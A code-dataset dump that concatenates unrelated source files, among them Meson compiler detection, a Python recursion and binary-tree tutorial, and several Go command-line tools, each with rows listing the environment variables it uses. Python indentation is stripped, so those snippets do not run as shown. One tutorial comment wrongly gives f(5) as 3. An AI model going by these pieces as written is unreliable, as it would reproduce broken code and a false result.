out = Popen_safe(compiler + arg)[1]
except OSError as e:
popen_exceptions[' '.join(compiler + arg)] = e
continue
version = search_version(out)
cls: T.Type[RustCompiler] = RustCompiler
# Clippy is a wrapper around rustc, but it doesn't have rustc in it's
# output. We can otherwise treat it as rustc.
if 'clippy' in out:
out = 'rustc'
cls = ClippyRustCompiler
if 'rustc' in out:
# On Linux and mac rustc will invoke gcc (clang for mac
# presumably) and it can do this windows, for dynamic linking.
# this means the easiest way to C compiler for dynamic linking.
# figure out what linker to use is to just get the value of the
# C compiler and use that as the basis of the rust linker.
# However, there are two things we need to change, if CC is not
# the default use that, and second add the necessary arguments
# to rust to use -fuse-ld
if any(a.startswith('linker=') for a in compiler):
mlog.warning(
'Please do not put -C linker= in your compiler '
'command, set rust_ld=command in your cross file '
'or use the RUST_LD environment variable, otherwise meson '
'will override your selection.')
compiler = compiler.copy() # avoid mutating the original list
if override is None:
extra_args: T.Dict[str, T.Union[str, bool]] = {}
always_args: T.List[str] = []
if is_link_exe:
compiler.extend(cls.use_linker_args(cc.linker.exelist[0]))
extra_args['direct'] = True
extra_args['machine'] = cc.linker.machine
else:
exelist = cc.linker.exelist + cc.linker.get_always_args()
if 'ccache' in exelist[0]:
del exelist[0]
c = exelist.pop(0)
compiler.extend(cls.use_linker_args(c))
# Also ensure that we pass any extra arguments to the linker
for l in exelist:
compiler.extend(['-C', f'link-arg={l}'])
# This trickery with type() gets us the class of the linker
# so we can initialize a new copy for the Rust Compiler
# TODO rewrite this without type: ignore
if is_link_exe:
linker = type(cc.linker)(for_machine, always_args, exelist=cc.linker.exelist, # type: ignore
version=cc.linker.version, **extra_args) # type: ignore
else:
linker = type(cc.linker)(compiler, for_machine, cc.LINKER_PREFIX,
always_args=always_args, version=cc.linker.version,
**extra_args) # type: ignore
elif 'link' in override[0]:
linker = guess_win_linker(env,
override, cls, for_machine, use_linker_prefix=False)
# rustc takes linker arguments without a prefix, and
# inserts the correct prefix itself.
assert isinstance(linker, VisualStudioLikeLinkerMixin)
linker.direct = True
compiler.extend(cls.use_linker_args(linker.exelist[0]))
else:
# On linux and macos rust will invoke the c compiler for
# linking, on windows it will use lld-link or link.exe.
# we will simply ask for the C compiler that corresponds to
# it, and use that.
cc = _detect_c_or_cpp_compiler(env, 'c', for_machine, override_compiler=override)
linker = cc.linker
# Of course, we're not going to use any of that, we just
# need it to get the proper arguments to pass to rustc
c = linker.exelist[1] if linker.exelist[0].endswith('ccache') else linker.exelist[0]
compiler.extend(cls.use_linker_args(c))
env.coredata.add_lang_args(cls.language, cls, for_machine, env)
return cls(
compiler, version, for_machine, is_cross, info, exe_wrap,
linker=linker)
_handle_exceptions(popen_exceptions, compilers)
raise EnvironmentException('Unreachable code (exception to make mypy happy)')
def detect_d_compiler(env: 'Environment', for_machine: MachineChoice) -> Compiler:
info = env.machines[for_machine]
# Detect the target architecture, required for proper architecture handling on Windows.
# MSVC compiler is required for correct platform detection.
c_compiler = {'c': detect_c_compiler(env, for_machine)}
is_msvc = isinstance(c_compiler['c'], VisualStudioCCompiler)
if not is_msvc:
c_compiler = {}
# Import here to avoid circular imports
from ..environment import detect_cpu_family
arch = detect_cpu_family(c_compiler)
if is_msvc and arch == 'x86':
arch = 'x86_mscoff'
popen_exceptions = {}
is_cross = env.is_cross_build(for_machine)
compilers, ccache, exe_wrap = _get_compilers(env, 'd', for_machine)
for exelist in compilers:
# Search for a D compiler.
# We prefer LDC over GDC unless overridden with the DC
# environment variable because LDC has a much more
# up to date language version at time (2016).
if os.path.basename(exelist[-1]).startswith(('ldmd', 'gdmd')):
raise EnvironmentException(
f'Meson does not support {exelist[-1]} as it is only a DMD frontend for another compiler.'
'Please provide a valid value for DC or unset it so that Meson can resolve the compiler by itself.')
try:
p, out = Popen_safe(exelist + ['--version'])[0:2]
except OSError as e:
popen_exceptions[' '.join(exelist + ['--version'])] = e
continue
version = search_version(out)
full_version = out.split('\n', 1)[0]
if 'LLVM D compiler' in out:
# LDC seems to require a file
# We cannot use NamedTemproraryFile on windows, its documented
# to not work for our uses. So, just use mkstemp and only have
# one path for simplicity.
o, f = tempfile.mkstemp('.d')
os.close(o)
try:
if info.is_windows() or info.is_cygwin():
objfile = os.path.basename(f)[:-1] + 'obj'
linker = guess_win_linker(env,
exelist,
LLVMDCompiler, for_machine,
use_linker_prefix=True, invoked_directly=False,
extra_args=[f])
else:
# LDC writes an object file to the current working directory.
# Clean it up.
objfile = os.path.basename(f)[:-1] + 'o'
linker = guess_nix_linker(env,
exelist, LLVMDCompiler, for_machine,
extra_args=[f])
finally:
windows_proof_rm(f)
windows_proof_rm(objfile)
return LLVMDCompiler(
exelist, version, for_machine, info, arch,
full_version=full_version, linker=linker, version_output=out)
elif 'gdc' in out:
linker = guess_nix_linker(env, exelist, GnuDCompiler, for_machine)
return GnuDCompiler(
exelist, version, for_machine, info, arch,
exe_wrapper=exe_wrap, is_cross=is_cross,
full_version=full_version, linker=linker)
elif 'The D Language Foundation' in out or 'Digital Mars' in out:
# DMD seems to require a file
# We cannot use NamedTemproraryFile on windows, its documented
# to not work for our uses. So, just use mkstemp and only have
# one path for simplicity.
o, f = tempfile.mkstemp('.d')
os.close(o)
# DMD as different detection logic for x86 and x86_64
arch_arg = '-m64' if arch == 'x86_64' else '-m32'
try:
if info.is_windows() or info.is_cygwin():
objfile = os.path.basename(f)[:-1] + 'obj'
linker = guess_win_linker(env,
exelist, DmdDCompiler, for_machine,
invoked_directly=False, extra_args=[f, arch_arg])
else:
objfile = os.path.basename(f)[:-1] + 'o'
linker = guess_nix_linker(env,
exelist, DmdDCompiler, for_machine,
extra_args=[f, arch_arg])
finally:
windows_proof_rm(f)
windows_proof_rm(objfile)
return DmdDCompiler(
exelist, version, for_machine, info, arch,
full_version=full_version, linker=linker)
raise EnvironmentException('Unknown compiler "' + ' '.join(exelist) + '"')
_handle_exceptions(popen_exceptions, compilers)
raise EnvironmentException('Unreachable code (exception to make mypy happy)')
def detect_swift_compiler(env: 'Environment', for_machine: MachineChoice) -> Compiler:
exelist = env.lookup_binary_entry(for_machine, 'swift')
is_cross = env.is_cross_build(for_machine)
info = env.machines[for_machine]
if exelist is None:
# TODO support fallback
exelist = [defaults['swift'][0]]
try:
p, _, err = Popen_safe(exelist + ['-v'])
except OSError:
raise EnvironmentException('Could not execute Swift compiler "{}"'.format(' '.join(exelist)))
version = search_version(err)
if 'Swift' in err:
# As for 5.0.1 swiftc *requires* a file to check the linker:
with tempfile.NamedTemporaryFile(suffix='.swift') as f:
linker = guess_nix_linker(env,
exelist, SwiftCompiler, for_machine,
extra_args=[f.name])
return SwiftCompiler(
exelist, version, for_machine, is_cross, info, linker=linker)
raise EnvironmentException('Unknown compiler "' + ' '.join(exelist) + '"')
# GNU/Clang defines and version
# =============================
def _get_gnu_compiler_defines(compiler: T.List[str]) -> T.Dict[str, str]:
"""
Detect GNU compiler platform type (Apple, MinGW, Unix)
"""
# Arguments to output compiler pre-processor defines to stdout
# gcc, g++, and gfortran all support these arguments
args = compiler + ['-E', '-dM', '-']
p, output, error = Popen_safe(args, write='', stdin=subprocess.PIPE)
if p.returncode != 0:
raise EnvironmentException('Unable to detect GNU compiler type:\n' + output + error)
# Parse several lines of the type:
# `#define ___SOME_DEF some_value`
# and extract `___SOME_DEF`
defines: T.Dict[str, str] = {}
for line in output.split('\n'):
if not line:
continue
d, *rest = line.split(' ', 2)
if d != '#define':
continue
if len(rest) == 1:
defines[rest[0]] = ''
if len(rest) == 2:
defines[rest[0]] = rest[1]
return defines
def _get_clang_compiler_defines(compiler: T.List[str]) -> T.Dict[str, str]:
"""
Get the list of Clang pre-processor defines
"""
args = compiler + ['-E', '-dM', '-']
p, output, error = Popen_safe(args, write='', stdin=subprocess.PIPE)
if p.returncode != 0:
raise EnvironmentException('Unable to get clang pre-processor defines:\n' + output + error)
defines: T.Dict[str, str] = {}
for line in output.split('\n'):
if not line:
continue
d, *rest = line.split(' ', 2)
if d != '#define':
continue
if len(rest) == 1:
defines[rest[0]] = ''
if len(rest) == 2:
defines[rest[0]] = rest[1]
return defines
def _get_gnu_version_from_defines(defines: T.Dict[str, str]) -> str:
dot = '.'
major = defines.get('__GNUC__', '0')
minor = defines.get('__GNUC_MINOR__', '0')
patch = defines.get('__GNUC_PATCHLEVEL__', '0')
return dot.join((major, minor, patch))
def _get_lcc_version_from_defines(defines: T.Dict[str, str]) -> str:
dot = '.'
generation_and_major = defines.get('__LCC__', '100')
generation = generation_and_major[:1]
major = generation_and_major[1:]
minor = defines.get('__LCC_MINOR__', '0')
return dot.join((generation, major, minor))
| [] | [] | [
"WATCOM"
] | [] | ["WATCOM"] | python | 1 | 0 | |
chessbot/config.py | import os
import datetime
TOKEN = os.environ.get("TOKEN")
DB_PATH = os.environ.get("DB_PATH")
EXPIRATION_TIMEDELTA = datetime.timedelta(days=7)
| [] | [] | [
"DB_PATH",
"TOKEN"
] | [] | ["DB_PATH", "TOKEN"] | python | 2 | 0 | |
cmd/main.go | package main
import (
"flag"
"fmt"
"github.com/sirupsen/logrus"
"github.com/yosuke-furukawa/json5/encoding/json5"
"io/ioutil"
"os"
"strings"
)
// Injected when compiling
var (
appVersion = "Unknown"
appCommit = "Unknown"
appDate = "Unknown"
)
var (
configPath = flag.String("config", "config.json", "Config file")
showVersion = flag.Bool("version", false, "Show version")
)
func init() {
logrus.SetOutput(os.Stdout)
lvl, err := logrus.ParseLevel(os.Getenv("LOGGING_LEVEL"))
if err == nil {
logrus.SetLevel(lvl)
} else {
logrus.SetLevel(logrus.DebugLevel)
}
// tsFormat is used to format the log timestamp, by default(empty)
// the RFC3339("2006-01-02T15:04:05Z07:00") format is used.
// The user can use environment variable to override the default
// timestamp format(e.g. "2006-01-02 15:04:05").
tsFormat := os.Getenv("LOGGING_TIMESTAMP_FORMAT")
fmtter := os.Getenv("LOGGING_FORMATTER")
if strings.ToLower(fmtter) == "json" {
logrus.SetFormatter(&logrus.JSONFormatter{
TimestampFormat: tsFormat,
})
} else {
logrus.SetFormatter(&logrus.TextFormatter{
ForceColors: true,
FullTimestamp: true,
TimestampFormat: tsFormat,
})
}
flag.Parse()
}
func main() {
if *showVersion {
// Print version and quit
fmt.Printf("%-10s%s\n", "Version:", appVersion)
fmt.Printf("%-10s%s\n", "Commit:", appCommit)
fmt.Printf("%-10s%s\n", "Date:", appDate)
return
}
cb, err := ioutil.ReadFile(*configPath)
if err != nil {
logrus.WithFields(logrus.Fields{
"file": *configPath,
"error": err,
}).Fatal("Failed to read configuration")
}
mode := flag.Arg(0)
if strings.EqualFold(mode, "server") {
// server mode
c, err := parseServerConfig(cb)
if err != nil {
logrus.WithFields(logrus.Fields{
"file": *configPath,
"error": err,
}).Fatal("Failed to parse server configuration")
}
server(c)
} else if len(mode) == 0 || strings.EqualFold(mode, "client") {
// client mode
c, err := parseClientConfig(cb)
if err != nil {
logrus.WithFields(logrus.Fields{
"file": *configPath,
"error": err,
}).Fatal("Failed to parse client configuration")
}
client(c)
} else {
// invalid
fmt.Println()
fmt.Printf("Usage: %s MODE [OPTIONS]\n\n"+
"Available modes: server, client\n\n", os.Args[0])
}
}
func parseServerConfig(cb []byte) (*serverConfig, error) {
var c serverConfig
err := json5.Unmarshal(cb, &c)
if err != nil {
return nil, err
}
return &c, c.Check()
}
func parseClientConfig(cb []byte) (*clientConfig, error) {
var c clientConfig
err := json5.Unmarshal(cb, &c)
if err != nil {
return nil, err
}
return &c, c.Check()
}
| [
"\"LOGGING_LEVEL\"",
"\"LOGGING_TIMESTAMP_FORMAT\"",
"\"LOGGING_FORMATTER\""
] | [] | [
"LOGGING_LEVEL",
"LOGGING_FORMATTER",
"LOGGING_TIMESTAMP_FORMAT"
] | [] | ["LOGGING_LEVEL", "LOGGING_FORMATTER", "LOGGING_TIMESTAMP_FORMAT"] | go | 3 | 0 | |
pytorch_lightning/utilities/distributed.py | # Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import warnings
from functools import wraps
from pytorch_lightning import _logger as log
def rank_zero_only(fn):
@wraps(fn)
def wrapped_fn(*args, **kwargs):
if rank_zero_only.rank == 0:
return fn(*args, **kwargs)
return wrapped_fn
# add the attribute to the function but don't overwrite in case Trainer has already set it
rank_zero_only.rank = getattr(rank_zero_only, 'rank', int(os.environ.get('LOCAL_RANK', 0)))
def _warn(*args, **kwargs):
warnings.warn(*args, **kwargs)
def _info(*args, **kwargs):
log.info(*args, **kwargs)
def _debug(*args, **kwargs):
log.debug(*args, **kwargs)
rank_zero_debug = rank_zero_only(_debug)
rank_zero_info = rank_zero_only(_info)
rank_zero_warn = rank_zero_only(_warn)
def find_free_network_port() -> int:
"""
Finds a free port on localhost.
It is useful in single-node training when we don't want to connect to a real master node but
have to set the `MASTER_PORT` environment variable.
"""
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("", 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
| [] | [] | [
"LOCAL_RANK"
] | [] | ["LOCAL_RANK"] | python | 1 | 0 | |
cmd/root.go | package cmd
import (
"os"
log "github.com/sirupsen/logrus"
"github.com/spf13/cobra"
"github.com/spf13/cobra/doc"
)
const (
version = "1.4.1"
)
var port int
var tls bool
var verbose bool
var rootCmd = &cobra.Command{
Use: "ktunnel",
Short: "Ktunnel is a network tunneling tool for kubernetes",
Long: `Built to ease development on kubernetes clusters and allow connectivity between dev machines and clusters`,
Version: version,
Args: cobra.MinimumNArgs(1),
}
var logger = log.Logger{
Out: os.Stdout,
Formatter: &log.TextFormatter{
ForceColors: true,
FullTimestamp: true,
TimestampFormat: "2006-01-02 15:04:05.000",
},
Level: log.InfoLevel,
}
func Execute() {
if genDoc := os.Getenv("GEN_DOC"); genDoc == "true" {
err := doc.GenMarkdownTree(rootCmd, "./docs")
if err != nil {
log.Errorf("Failed generating docs: %v", err)
}
}
if err := rootCmd.Execute(); err != nil {
logger.WithError(err).Errorf("error executing command")
os.Exit(1)
}
}
func init() {
rootCmd.PersistentFlags().IntVarP(&port, "port", "p", 28688, "The port to use to establish the tunnel")
rootCmd.PersistentFlags().BoolVarP(&tls, "tls", "t", false, "Connection uses tls if true, else plain TCP")
rootCmd.PersistentFlags().BoolVarP(&verbose, "verbose", "v", false, "verbose mode")
_ = rootCmd.MarkFlagRequired("port")
}
| [
"\"GEN_DOC\""
] | [] | [
"GEN_DOC"
] | [] | ["GEN_DOC"] | go | 1 | 0 | |
9z10_tree_recursion.py | # 1/22/2020
# 递归 recursion
# 递归的定义: 首先这个问题或者数据结构得是递归定义的
# 递归的出口: 什么时候递归终止
# 递归的拆解: 递归不终止的时候,如何分解问题
# 方式:
# 1. 写出临界条件
# 2. 找一次和上一次的关系
# 3. 假设当前函数已经能用,调用自身计算上一次的结果,再求出本次的结果
# fibonacci
# 递归的定义: 因为斐波那契数列满足 F(n) = F(n-1) + F(n-2)
# 递归的出口: n = 0 和 n = 1 的时候,问题规模足够小的时候
# 递归的拆解: return fibonacci(n-1) + fibonacci(n-2)
list1 = []
def f(n):
list1.append(n)
if n == 1 or n == 2:
return 1
return f(n-1) + f(n-2)
print("res = %d" % f(5)) # res = 3
for i in list1:
print("f(%d)" % i, end=" ") # output: f(5) f(4) f(3) f(2) f(1) f(2) f(3) f(2) f(1)
list2 = []
def f(n):
list2.append(n)
if n == 1 or n == 2:
return 1
return f(n-2) + f(n-1)
print("")
print("res = %d" % f(5)) # res = 3
for i in list2:
print("f(%d)" % i, end=" ") # output: f(5) f(3) f(1) f(2) f(4) f(2) f(3) f(1) f(2)
print("")
print("======================================")
# fibonacci loop
def fib(N):
a = 0
b = 1
if N <= 0:
return a
if N == 2 or N == 1:
return b
while N > 0:
a, b = b, a + b
N -= 1
return a
print(fib(3))
print("======================================")
def fib_loop(n):
a, b = 0, 1 # f(0) = 0 , f(1) = 1
for i in range(n):
a, b = b, a + b # f(n-1) + f(n-2)
return a
print(fib_loop(6))
print("======================================")
# Tree 树
# 树的概念: 是一种抽象数据类型,用来模拟具有树状结构性质的数据集合,它由n(n>-1) 个有限节点组成一个具有层次关系的集合。
# 树: 好比一个公司
# * 由节点(node)组成
# * 每个节点有零个或多个子节点(child node) ; 这是一个manager,他管理很多人
# * 没有父节点的是根节点(root node) ; 公司的大BOSS
# * 每个非根节点只有一个父节点(parent node) ; 除了大BOSS, 每个人都有一个manager
# * 没有任何子节点的节点都叫叶子节点(leaf node) ; 底层的员工
# * 一颗树中,只有一个root node ; 大BOSS只允许有一个
# 二叉树(binary tree)
# * 每个节点 最多 有两个子节点
# * 两个子节点分别被称为左孩子(left node) 和 右孩子(right node)
# * 叶子节点: 没有孩子节点的节点
# * 不特别说明的话, 我们提到的树是指二叉树
# 二叉树的性质:
# 在二叉树的第i层上, 最多有 2^(i-1)个节点 比如在第3层,i = 3, 最多有 2^(3-1) = 4 个节点
# 深度为k的二叉树最多有 2^k - 1个节点 ; 比如深度为4, k = 4, 2^4 - 1 = 15 个节点
# 对于完全二叉树,若从上至下,从左到右编号,则编号为 i 的节点, 其左孩子编号必为 2i,其右孩子编号必为 2i + 1;其双亲编号必为 i/2.
# 完全二叉树(complete binary tree) : 除了最底层除外,其他所有层的节点都达到最大化(2)
# 若设二叉树的深度为h,除第 h 层外,其它各层 (1~h-1) 的结点数都达到最大个数,
# 第 h 层所有的结点都连续集中在最左边,这就是完全二叉树。
# 满二叉树(Full binary tree) : 所有层必须达到最大化
# 二叉排序树(binary search tree): 对于任何一个节点来说,它的左节点的值一定比它小, 它的右节点的值一定比它大
# 8
# / \
# 3 10
# / \ \
# 1 6 14
# / \ /
# 4 7 13
# 二分查找
# 常见的树的应用场景 : html,编写这些东西的解析器的时候; 路由协议就是使用了树的算法; mysql数据库索引;文件系统的目录结构;
# 树的节点:
class TreeNode(object):
def __init__(self, item):
self.item = item
self.left = None
self.right = None
# 二叉树树的实现:
class BinaryTree(object):
def __init__(self):
self.root = None
def add(self, item): # 添加新的 节点
# 使用 广度优先遍历: 树结构横向遍历; 层次遍历添加节点
node = TreeNode(item) # 创建一个新的 node 节点
if self.root == None: # 如果根节点为空
self.root = node # 根节点指向 新的node
return
count = 0
queue = [self.root] # 创建一个 queue 列表,把根节点放入; 使用队列的形式遍历整个树结构;
while queue: # 遍历循环 直到 queue 列表为空; 空列表 return False; 列表不为空时,return True
current_node = queue.pop(0) # 删除 queue 列表中的第一个节点,命名一个current(当前) 节点 指向 那个被删除的节点
if current_node.left == None: # 如果 current 节点的 左节点(左孩子) 为空
current_node.left = node # 左节点 指向 新添加的 node
return
else:
queue.append(current_node.left) # 如果当前节点 的 左节点 不为空,把那个左节点放入queue列表中
if current_node.right == None: # 如果 current 节点的 右节点(右孩子) 为空
current_node.right = node # 右节点 指向 新添加的 node
return
else:
queue.append(current_node.right)
def breadth_travel(self):
# 广度遍历(层次遍历)
if self.root == None: # 如果 根节点为空
return # 跳出
queue = [self.root] # 建立 queue 列表, 里面 包含 根节点
while queue: # 遍历循环 直到 queue 列表为空; 空列表 return False ;列表不为空时,return True
current_node = queue.pop(0) # 删除 queue 列表中的第一个节点,命名一个current(当前) 节点 指向 那个被删除的节点
print(current_node.item, end=" ") # print current 节点的 值
if current_node.left != None: # 如果 current 节点的 左节点(左孩子) 不为空
queue.append(current_node.left) # 将 current 节点的 左节点(左孩子) 添加到 queue列表的尾部
if current_node.right != None: # 如果 current 节点的 右节点(右孩子) 不为空
queue.append(current_node.right) # 将 current 节点的 右节点(右孩子) 添加到 queue列表的尾部
def perOreder(self, node): # 先序遍历 根 左 右
if node == None:
return
print(node.item, end=" ")
self.perOreder(node.left)
self.perOreder(node.right)
def inOrder(self, node): # 中序遍历 左 根 右
if node == None:
return
self.inOrder(node.left)
print(node.item, end=" ")
self.inOrder(node.right)
def postOrder(self, node): # 后续遍历 左 右 根
if node == None:
return
self.postOrder(node.left)
self.postOrder(node.right)
print(node.item, end=" ")
def leafSum(self, node): # 求叶子节点的和 O(n) ; 树里的时间复杂度 都是O(n);因为每个节点仅被访问一次
if node == None: # 如果node 节点为空
return 0 # 返回 0
if node.left == None and node.right == None: # 如果左边是空,右边是空,说明这是个叶子节点
return node.item # 返回叶子节点的值
return self.leafSum(node.left) + self.leafSum(node.right) # 返回叶子节点的加和
def maxDepth(self, node): # 求树的最大深度 O(n) / 这题是用最大高度 ; 深度是对于节点而言,高度是对于子树或树而言
if node == None:
return 0
if node.left == None and node.right == None: # 如果左边是空,右边是空,说明这是个叶子节点
return 1 # 返回 1
return max(self.maxDepth(node.left), self.maxDepth(node.right)) + 1 # 每递归一次,深度 + 1
if __name__ == "__main__":
tree = BinaryTree()
tree.add(0)
tree.add(1)
tree.add(2)
tree.add(3)
tree.add(4)
tree.add(5)
tree.add(6)
tree.add(7)
tree.add(8)
tree.add(9)
tree.breadth_travel() # 广度层次遍历 output: 0 1 2 3 4 5 6 7 8 9
print("")
tree.perOreder(tree.root) # 根 左 右 output: 0 1 3 7 8 4 9 2 5 6
print("")
tree.inOrder(tree.root) # 左 根 右 output: 7 3 8 1 9 4 0 5 2 6
print("")
tree.postOrder(tree.root) # 左 右 根 output: 7 8 3 9 4 1 5 6 2 0
print("")
print(tree.leafSum(tree.root)) # output: 35
print("")
print(tree.maxDepth(tree.root))
def reverse(x):
"""
:type x: int
:rtype: int
"""
str1 = str(x)
sign = 1
start = 0
j = 1
print(str1)
if str1[0] == "-":
start = 1
sign = -1
num = ""
for i in range(start, len(str1)):
num += str1[- j]
print("num", num)
j += 1
return sign * int(num)
n = 1234567
print(reverse(n))
| [] | [] | [] | [] | [] | python | null | null | null |
examples/proxy-info/main.go | /*
* Copyright (c) CERN 2016
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package main
import (
"crypto/rsa"
"crypto/x509/pkix"
"flag"
"fmt"
"github.com/ayllon/go-proxy"
"log"
"os"
)
var proxyPath = flag.String("file", "", "Proxy location")
var typeRepr = []string{"Not a proxy", "Legacy proxy", "Draft proxy", "RFC 3820 Proxy"}
func getProxyPath() string {
if path := os.Getenv("X509_USER_PROXY"); path != "" {
return path
}
return fmt.Sprintf("/tmp/x509up_u%d", os.Getuid())
}
func main() {
capath := flag.String("capath", "/etc/grid-security/certificates", "Directory with the root CAs")
vomsdir := flag.String("vomsdir", "/etc/grid-security/vomsdir/", "VOMS dir")
debug := flag.Bool("debug", false, "Dump extra information")
crls := flag.Bool("crls", false, "Load CRLs")
flag.Parse()
if *proxyPath == "" {
*proxyPath = getProxyPath()
}
var p proxy.X509Proxy
if e := p.DecodeFromFile(*proxyPath); e != nil {
log.Fatal(e)
}
roots, err := proxy.LoadCAPath(*capath, *crls)
if err != nil {
fmt.Printf("Failed to load the root CA: %s", err)
} else if *debug {
fmt.Println("Loaded root CA")
for hash, ca := range roots.CaByHash {
fmt.Println(hash, " ", proxy.NameRepr(&ca.Subject))
}
fmt.Println("\nLoaded CRLs")
for hash, crl := range roots.Crls {
name := pkix.Name{}
name.FillFromRDNSequence(&crl.TBSCertList.Issuer)
fmt.Println(hash, " ", proxy.NameRepr(&name))
}
fmt.Println("")
}
fmt.Printf("subject : %s\n", proxy.NameRepr(&p.Subject))
fmt.Printf("issuer : %s\n", proxy.NameRepr(&p.Issuer))
fmt.Printf("identity : %s\n", proxy.NameRepr(&p.Identity))
fmt.Printf("type : %s\n", typeRepr[p.ProxyType])
fmt.Printf("strength : %d bits\n", p.Certificate.PublicKey.(*rsa.PublicKey).N.BitLen())
fmt.Printf("timeleft : %s\n", p.Lifetime())
fmt.Printf("key usage : %s\n", proxy.KeyUsageRepr(p.Certificate.KeyUsage))
if len(p.VomsAttributes) > 0 {
fmt.Print("=== VO dteam extension information ===\n")
}
for _, v := range p.VomsAttributes {
fmt.Printf("VO : %s\n", v.Vo)
fmt.Printf("subject : %s\n", proxy.NameRepr(&v.Subject))
fmt.Printf("issuer : %s\n", proxy.NameRepr(&v.Issuer))
fmt.Printf("attribute : %s\n", v.Fqan)
fmt.Printf("timeleft : %s\n", v.Lifetime())
fmt.Printf("uri : %s\n", v.PolicyAuthority)
}
if roots != nil {
if err = p.Verify(proxy.VerifyOptions{
Roots: roots,
VomsDir: *vomsdir,
}); err != nil {
fmt.Printf("Verification result: %s\n", err)
} else {
fmt.Printf("Verification OK\n")
}
}
}
| [
"\"X509_USER_PROXY\""
] | [] | [
"X509_USER_PROXY"
] | [] | ["X509_USER_PROXY"] | go | 1 | 0 | |
cmd/main.go | package main
import (
"flag"
"log"
"os"
"os/signal"
"path/filepath"
"sync"
"time"
"syscall"
"github.com/lwolf/kube-cleanup-operator/pkg/controller"
"k8s.io/client-go/kubernetes"
_ "k8s.io/client-go/plugin/pkg/client/auth/gcp" // TODO: Add all auth providers
_ "k8s.io/client-go/plugin/pkg/client/auth/oidc"
"k8s.io/client-go/tools/clientcmd"
)
func main() {
// Set logging output to standard console out
log.SetOutput(os.Stdout)
sigs := make(chan os.Signal, 1) // Create channel to receive OS signals
stop := make(chan struct{}) // Create channel to receive stop signal
signal.Notify(sigs, os.Interrupt, syscall.SIGTERM, syscall.SIGINT) // Register the sigs channel to receieve SIGTERM
wg := &sync.WaitGroup{} // Goroutines can add themselves to this to be waited on so that they finish
runOutsideCluster := flag.Bool("run-outside-cluster", false, "Set this flag when running outside of the cluster.")
namespace := flag.String("namespace", "", "Watch only this namespaces")
keepSuccess := flag.Duration("keep-successful", 15*time.Minute, "Duration to keep successful jobs, forever if negative, e.g. 1h15m")
keepFailed := flag.Duration("keep-failures", 15*time.Minute, "Duration to keep failed jobs, forever if negative, e.g. 1h15m")
keepPending := flag.Duration("keep-pending", 15*time.Minute, "Duration to keep pending jobs, forever if negative, e.g. 1h15m")
dryRun := flag.Bool("dry-run", false, "Print only, do not delete anything.")
flag.Parse()
// Create clientset for interacting with the kubernetes cluster
clientset, err := newClientSet(*runOutsideCluster)
if err != nil {
log.Fatal(err.Error())
}
options := map[string]time.Duration{
"keepSuccess": *keepSuccess,
"keepFailed": *keepFailed,
"keepPending": *keepPending,
}
if *dryRun {
log.Println("Performing dry run...")
}
log.Printf(
"Provided settings: namespace=%s, dryRun=%t, keepSuccess: %s, keepFailed: %s, keepPending: %s",
*namespace, *dryRun, *keepSuccess, *keepFailed, *keepPending,
)
go func() {
wg.Add(1)
defer wg.Done()
controller.NewPodController(clientset, *namespace, *dryRun, options).Run(stop)
}()
log.Printf("Controller started...")
<-sigs // Wait for signals (this hangs until a signal arrives)
log.Printf("Shutting down...")
close(stop) // Tell goroutines to stop themselves
wg.Wait() // Wait for all to be stopped
}
func newClientSet(runOutsideCluster bool) (*kubernetes.Clientset, error) {
kubeConfigLocation := ""
if runOutsideCluster == true {
if os.Getenv("KUBECONFIG") != "" {
kubeConfigLocation = filepath.Join(os.Getenv("KUBECONFIG"))
} else {
homeDir := os.Getenv("HOME")
kubeConfigLocation = filepath.Join(homeDir, ".kube", "config")
}
}
// use the current context in kubeconfig
config, err := clientcmd.BuildConfigFromFlags("", kubeConfigLocation)
if err != nil {
return nil, err
}
return kubernetes.NewForConfig(config)
}
| [
"\"KUBECONFIG\"",
"\"KUBECONFIG\"",
"\"HOME\""
] | [] | [
"HOME",
"KUBECONFIG"
] | [] | ["HOME", "KUBECONFIG"] | go | 2 | 0 | |
shared/util.go | package shared
import (
"bufio"
"bytes"
"context"
"crypto/rand"
"encoding/gob"
"encoding/hex"
"fmt"
"hash"
"io"
"io/ioutil"
"net/http"
"net/url"
"os"
"os/exec"
"path"
"path/filepath"
"reflect"
"regexp"
"runtime"
"strconv"
"strings"
"time"
"github.com/flosch/pongo2"
"github.com/pkg/errors"
"github.com/lxc/lxd/shared/cancel"
"github.com/lxc/lxd/shared/ioprogress"
"github.com/lxc/lxd/shared/units"
)
const SnapshotDelimiter = "/"
const HTTPSDefaultPort = 8443
const HTTPDefaultPort = 8080
const HTTPSMetricsDefaultPort = 9100
// URLEncode encodes a path and query parameters to a URL.
func URLEncode(path string, query map[string]string) (string, error) {
u, err := url.Parse(path)
if err != nil {
return "", err
}
params := url.Values{}
for key, value := range query {
params.Add(key, value)
}
u.RawQuery = params.Encode()
return u.String(), nil
}
// AddSlash adds a slash to the end of paths if they don't already have one.
// This can be useful for rsyncing things, since rsync has behavior present on
// the presence or absence of a trailing slash.
func AddSlash(path string) string {
if path[len(path)-1] != '/' {
return path + "/"
}
return path
}
func PathExists(name string) bool {
_, err := os.Lstat(name)
if err != nil && os.IsNotExist(err) {
return false
}
return true
}
// PathIsEmpty checks if the given path is empty.
func PathIsEmpty(path string) (bool, error) {
f, err := os.Open(path)
if err != nil {
return false, err
}
defer f.Close()
// read in ONLY one file
_, err = f.Readdir(1)
// and if the file is EOF... well, the dir is empty.
if err == io.EOF {
return true, nil
}
return false, err
}
// IsDir returns true if the given path is a directory.
func IsDir(name string) bool {
stat, err := os.Stat(name)
if err != nil {
return false
}
return stat.IsDir()
}
// IsUnixSocket returns true if the given path is either a Unix socket
// or a symbolic link pointing at a Unix socket.
func IsUnixSocket(path string) bool {
stat, err := os.Stat(path)
if err != nil {
return false
}
